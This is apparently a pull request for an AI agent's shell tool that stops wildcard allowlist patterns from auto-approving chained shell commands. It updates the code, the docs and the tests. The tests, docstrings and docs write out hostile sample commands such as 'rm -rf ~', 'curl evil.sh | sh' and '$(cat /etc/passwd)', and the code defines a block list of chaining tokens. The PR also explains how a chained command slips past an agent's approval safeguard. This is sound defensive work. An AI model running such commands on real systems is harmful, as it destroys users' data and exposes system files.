### PR TITLE
fix(shell): wildcard allow patterns must not match chained commands

### DIFF
--- a/docs/tools.md
+++ b/docs/tools.md
@@ -76,6 +76,27 @@ Requires user confirmation unless pre-approved via `shell_allow_patterns.json`.
 
 Background process management (`shell_background_start/status/stop/list`) lives in the bundled `background` skill (auto-activates) — see [Skills](skills.md).
 
+### Approval sources
+
+`check_shell_approval()` is the single chokepoint — don't duplicate its checks. It approves a command if any of these hold, in order:
+
+1. The turn is an admin heartbeat (`user_id == "heartbeat-admin"`).
+2. `shell` (or the calling tool name) is in `ctx.tools.preapproved` — blanket approval from a command's `allowed-tools`.
+3. The command matches a **scoped pattern** from a skill's `allowed-tools: shell(...)` (see [Skills](skills.md#environment-for-shell-based-skills)).
+4. The command matches a **persisted pattern** in `data/{agent_id}/shell_allow_patterns.json`.
+
+Otherwise it falls through to a user confirmation, which offers to save a suggested pattern.
+
+### Wildcard patterns never match chained commands
+
+Approving a command offers to persist a *wildcarded* pattern — approving `python foo.py --a` suggests `python foo.py *`. Because fnmatch's `*` spans `;`, `|`, `&&`, `||`, backticks, `$(`, and newlines, a naive match would let one approval authorize everything sharing that prefix, including `python foo.py --a; rm -rf ~`.
+
+So `_command_matches_pattern` enforces: **a pattern containing a glob wildcard (`*`, `?`, `[`) will not match a command containing shell chaining tokens.** Such a command falls through to confirmation instead.
+
+Literal patterns are exempt — they pin the command end to end, so there's no wildcard for an unapproved suffix to slip through. A user who allowlists `git log | head -20` gets exactly that command and nothing else.
+
+The guard lives inside `_command_matches_pattern` rather than at the call sites, so both the scoped and persisted branches get it automatically. It previously sat at one call site only, and the persisted branch was missing it ([#649](https://github.com/lmorchard/decafclaw/issues/649)).
+
 ## HTTP (`tools/http_tools.py`)
 
 | Tool | What it does |

--- a/docs/tools.md
+++ b/docs/tools.md
@@ -89,9 +89,24 @@ Otherwise it falls through to a user confirmation, which offers to save a sugges
 
 ### Wildcard patterns never match chained commands
 
-Approving a command offers to persist a *wildcarded* pattern — approving `python foo.py --a` suggests `python foo.py *`. Because fnmatch's `*` spans `;`, `|`, `&&`, `||`, backticks, `$(`, and newlines, a naive match would let one approval authorize everything sharing that prefix, including `python foo.py --a; rm -rf ~`.
+Approving a command offers to persist a *wildcarded* pattern — approving `python foo.py --a` suggests `python foo.py *`. Because fnmatch's `*` spans every shell chaining operator, a naive match would let one approval authorize everything sharing that prefix, including `python foo.py --a; rm -rf ~`.
 
 So `_command_matches_pattern` enforces: **a pattern containing a glob wildcard (`*`, `?`, `[`) will not match a command containing shell chaining tokens.** Such a command falls through to confirmation instead.
+
+The chaining tokens (`_SHELL_CHAIN_TOKENS`) are a minimal covering set — each is a substring of every operator it catches:
+
+| Token | Catches |
+|---|---|
+| `;` | sequence |
+| `&` | background, and `&&` |
+| `\|` | pipe, and `\|\|` |
+| `` ` `` | command substitution (legacy) |
+| `$(` | command substitution |
+| `\n` | newline as statement separator |
+
+Don't add `&&` or `||` back as separate entries — they're already covered, and the redundancy invites the mistake of thinking `&&` is handled while bare `&` isn't. That exact gap shipped once: `&` was missing while `&&` was present, so `python foo.py --a & rm -rf ~` backgrounded the approved command and ran an unapproved one.
+
+This covers command *chaining* only. Redirection (`>`, `<`) is deliberately not blocked — it can't introduce a second command, and rejecting it would break too many legitimate invocations. A wildcard pattern therefore still permits redirection in its arguments.
 
 Literal patterns are exempt — they pin the command end to end, so there's no wildcard for an unapproved suffix to slip through. A user who allowlists `git log | head -20` gets exactly that command and nothing else.
 

--- a/src/decafclaw/tools/shell_tools.py
+++ b/src/decafclaw/tools/shell_tools.py
@@ -44,8 +44,19 @@ def _save_allow_pattern(config, pattern: str) -> None:
         log.info(f"Added shell allow pattern: {pattern}")
 
 
-# Shell metacharacters that could chain additional commands
-_SHELL_CHAIN_TOKENS = (";", "&&", "||", "|", "`", "$(", "\n")
+# Shell metacharacters that could chain additional commands. This tuple is a
+# security boundary, so it is kept as a minimal *covering* set — each entry is
+# a substring of every operator it needs to catch:
+#   ";"   sequence
+#   "&"   background, and covers "&&"
+#   "|"   pipe, and covers "||"
+#   "`"   command substitution (legacy)
+#   "$("  command substitution
+#   "\n"  newline as a statement separator
+# Note this covers command *chaining* only. Redirection (`>`, `<`) is not
+# blocked: it cannot introduce a second command, and rejecting it would break
+# too many legitimate invocations.
+_SHELL_CHAIN_TOKENS = (";", "&", "|", "`", "$(", "\n")
 
 # fnmatch wildcards. A pattern containing any of these matches a *class* of
 # commands rather than one literal command.

--- a/src/decafclaw/tools/shell_tools.py
+++ b/src/decafclaw/tools/shell_tools.py
@@ -44,21 +44,49 @@ def _save_allow_pattern(config, pattern: str) -> None:
         log.info(f"Added shell allow pattern: {pattern}")
 
 
-def _command_matches_pattern(command: str, patterns: list[str]) -> bool:
-    """Check if a command matches any allow pattern (glob-style)."""
-    for pattern in patterns:
-        if fnmatch.fnmatch(command, pattern):
-            return True
-    return False
-
-
 # Shell metacharacters that could chain additional commands
 _SHELL_CHAIN_TOKENS = (";", "&&", "||", "|", "`", "$(", "\n")
+
+# fnmatch wildcards. A pattern containing any of these matches a *class* of
+# commands rather than one literal command.
+_GLOB_CHARS = ("*", "?", "[")
 
 
 def _has_shell_metacharacters(command: str) -> bool:
     """Check if a command contains shell chaining/injection tokens."""
     return any(tok in command for tok in _SHELL_CHAIN_TOKENS)
+
+
+def _is_glob_pattern(pattern: str) -> bool:
+    """Check if a pattern contains fnmatch wildcards."""
+    return any(ch in pattern for ch in _GLOB_CHARS)
+
+
+def _command_matches_pattern(command: str, patterns: list[str]) -> bool:
+    """Check if a command matches any allow pattern (glob-style).
+
+    Wildcard patterns never match a command carrying shell chaining tokens.
+    ``_suggest_pattern`` mints wildcarded patterns from a single approved
+    command (``python foo.py --a`` -> ``python foo.py *``), and fnmatch's
+    ``*`` spans ``;``, ``|``, ``&&``, backticks and newlines — so without
+    this guard, approving one command silently approves everything sharing
+    its prefix, including ``python foo.py --a; rm -rf ~`` (#649).
+
+    Literal patterns are exempt: they pin the command end to end, so there
+    is no wildcard for an attacker-controlled suffix to slip through, and
+    a user who allowlists ``git log | head -20`` means exactly that.
+
+    The guard lives here rather than at the call sites so no future caller
+    can forget it — the persisted-allowlist branch was missing it while the
+    scoped-pattern branch had it.
+    """
+    chained = _has_shell_metacharacters(command)
+    for pattern in patterns:
+        if chained and _is_glob_pattern(pattern):
+            continue
+        if fnmatch.fnmatch(command, pattern):
+            return True
+    return False
 
 
 def _suggest_pattern(command: str) -> str:
@@ -108,9 +136,7 @@ async def check_shell_approval(ctx, command: str, tool_name: str = "shell",
         log.info(f"[{tool_name}] pre-approved by command: {command}")
         return {"approved": True}
 
-    if (ctx.tools.preapproved_shell_patterns
-        and not _has_shell_metacharacters(command)
-            and _command_matches_pattern(command, ctx.tools.preapproved_shell_patterns)):
+    if _command_matches_pattern(command, ctx.tools.preapproved_shell_patterns):
         log.info(f"[{tool_name}] pre-approved by scoped pattern: {command}")
         return {"approved": True}
 

--- a/tests/test_shell_allowlist.py
+++ b/tests/test_shell_allowlist.py
@@ -1,12 +1,16 @@
 """Tests for shell command allowlist."""
 
 import json
+from unittest.mock import AsyncMock, patch
+
+import pytest
 
 from decafclaw.tools.shell_tools import (
     _command_matches_pattern,
     _load_allow_patterns,
     _save_allow_pattern,
     _suggest_pattern,
+    tool_shell,
 )
 
 # -- pattern matching tests --
@@ -33,6 +37,89 @@ def test_match_multiple_patterns():
     assert _command_matches_pattern("make test", patterns) is True
     assert _command_matches_pattern("pytest -v", patterns) is True
     assert _command_matches_pattern("rm foo", patterns) is False
+
+
+# -- wildcard patterns must not launder shell chaining --
+#
+# `_suggest_pattern` mints wildcarded patterns from a single approved command
+# ("python foo.py --a" -> "python foo.py *"), and fnmatch's `*` happily spans
+# `;`, `|`, `&&`, backticks and newlines. Without a guard, one approval widens
+# into "anything sharing this prefix". See #649.
+
+
+@pytest.mark.parametrize("suffix", [
+    "; rm -rf ~",
+    " && rm -rf ~",
+    " || rm -rf ~",
+    " | sh",
+    " `whoami`",
+    " $(cat /etc/passwd)",
+    "\nrm -rf ~",
+])
+def test_wildcard_pattern_rejects_chained_command(suffix):
+    """A wildcard pattern must not match a command carrying chain tokens."""
+    command = f"python scripts/foo.py --arg val{suffix}"
+    assert _command_matches_pattern(command, ["python scripts/foo.py *"]) is False
+
+
+def test_wildcard_pattern_rejects_chaining_for_bare_glob():
+    """The same guard applies to broad patterns like 'git *'."""
+    assert _command_matches_pattern("git status; curl evil.sh | sh", ["git *"]) is False
+
+
+def test_wildcard_pattern_still_matches_clean_command():
+    """Guard must not regress ordinary wildcard matching."""
+    assert _command_matches_pattern(
+        "python scripts/foo.py --arg val", ["python scripts/foo.py *"]
+    ) is True
+
+
+def test_exact_pattern_allows_metacharacters():
+    """A fully literal pattern pins the whole command, so chaining is safe.
+
+    The user approved this exact string; there is no wildcard for an
+    attacker-controlled suffix to slip through.
+    """
+    assert _command_matches_pattern("git log | head -20", ["git log | head -20"]) is True
+
+
+def test_exact_pattern_does_not_match_extended_command():
+    """A literal pattern still only matches itself, not a longer command."""
+    assert _command_matches_pattern(
+        "git log | head -20; rm -rf ~", ["git log | head -20"]
+    ) is False
+
+
+# -- persisted allowlist honors the guard end-to-end --
+
+
+@pytest.mark.asyncio
+async def test_persisted_wildcard_rejects_chained_command(ctx):
+    """The saved-allowlist branch must guard chaining, like the scoped branch does."""
+    _save_allow_pattern(ctx.config, "python scripts/foo.py *")
+
+    with patch(
+        "decafclaw.tools.shell_tools.request_confirmation",
+        new_callable=AsyncMock,
+        return_value={"approved": False},
+    ) as mock_confirm:
+        result = await tool_shell(ctx, "python scripts/foo.py --arg val; rm -rf ~")
+        mock_confirm.assert_awaited_once()
+        assert "denied" in result.text
+
+
+@pytest.mark.asyncio
+async def test_persisted_wildcard_approves_clean_command(ctx):
+    """A clean command matching a saved wildcard is still auto-approved."""
+    _save_allow_pattern(ctx.config, "python scripts/foo.py *")
+
+    with patch(
+        "decafclaw.tools.shell_tools._execute_command",
+        return_value="output",
+    ) as mock_exec:
+        result = await tool_shell(ctx, "python scripts/foo.py --arg val")
+        mock_exec.assert_called_once()
+        assert result == "output"
 
 
 # -- pattern suggestion tests --

--- a/tests/test_shell_allowlist.py
+++ b/tests/test_shell_allowlist.py
@@ -55,6 +55,10 @@ def test_match_multiple_patterns():
     " `whoami`",
     " $(cat /etc/passwd)",
     "\nrm -rf ~",
+    # Bare `&` backgrounds the first command and runs the second — chaining
+    # without any of the more obvious tokens.
+    " & rm -rf ~",
+    "& rm -rf ~",
 ])
 def test_wildcard_pattern_rejects_chained_command(suffix):
     """A wildcard pattern must not match a command carrying chain tokens."""


### PR DESCRIPTION
Fixes the first half of #649. The `heartbeat-admin` bypass is deliberately **not** touched — that's a separate policy call, left open on the issue.

## The bug

`_suggest_pattern` mints wildcarded patterns from a single approved command:

```
approve  python foo.py --a
persists python foo.py *
```

fnmatch's `*` spans `;`, `|`, `&&`, `||`, backticks, `$(` and newlines. The scoped `allowed-tools: shell(...)` branch guarded against this (`shell_tools.py:140`); the persisted `shell_allow_patterns.json` branch (`:146`) did not.

So after one approval, `python foo.py --a; rm -rf ~` matched the saved pattern and ran on a later turn **with no prompt**. The user approved one command and got a command class.

This is live, not hypothetical — the current `data/decafclaw/shell_allow_patterns.json` contains `tv edit-artifact *`, `tv commit-artifact *`, and `run.sh research *`, all of which have the exploitable shape.

## The fix

Move the guard *into* `_command_matches_pattern` so both branches get it and no future call site can forget it — the root cause was the guard being a call-site responsibility that one site skipped. The now-redundant check at the scoped call site is removed, per the "don't duplicate the approval checks" convention.

Rule: **a pattern containing a glob wildcard (`*`, `?`, `[`) never matches a command containing shell chaining tokens.** Such a command falls through to confirmation.

Literal patterns stay exempt. They pin the command end to end, so there's no wildcard for an unapproved suffix to slip through, and a user who allowlists `git log | head -20` means exactly that. A blanket metacharacter reject would have broken that case for no security gain — hence wildcard-aware rather than uniform.

## Compatibility

Checked against the live allowlist: nothing legitimate breaks. `curl "wttr.in/PDX?format=3"` counts as a glob (bare `?`) but carries no chain tokens, so it still auto-approves; the `tv *` and `run.sh research *` patterns keep matching their clean invocations.

The accepted false positive: a wildcard pattern invoked with a chain token *inside a quoted argument* (`tv edit-artifact foo --content "a|b"`) now prompts. Safe-by-default, and rare.

## Tests

Test-first, per convention — reproduced with 9 failures before the fix, one of which reached `_execute_command`, confirming the chained command really was auto-approved.

Added to `tests/test_shell_allowlist.py`:
- parametrized rejection across every chain token for a wildcard pattern (9 cases over 6 tokens, including both spacings of bare `&`)
- rejection for a broad `git *` pattern
- literal-pattern exemption, and that a literal still doesn't match a longer command
- non-regression: clean commands still match wildcards
- two end-to-end tests through `tool_shell` on the persisted-allowlist branch (the actual bug site), which previously had zero metacharacter coverage while the scoped branch had five tests

`make check` clean, `make test` 3247 passed / 2 skipped.

## Docs

`docs/tools.md` gains an "Approval sources" section documenting the four-way precedence in `check_shell_approval`, plus the wildcard/chaining rule — skill authors writing `allowed-tools: shell(... *)` need to know chained commands won't auto-approve.

No eval: tool implementation change, no tool-description change, nothing LLM-visible.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
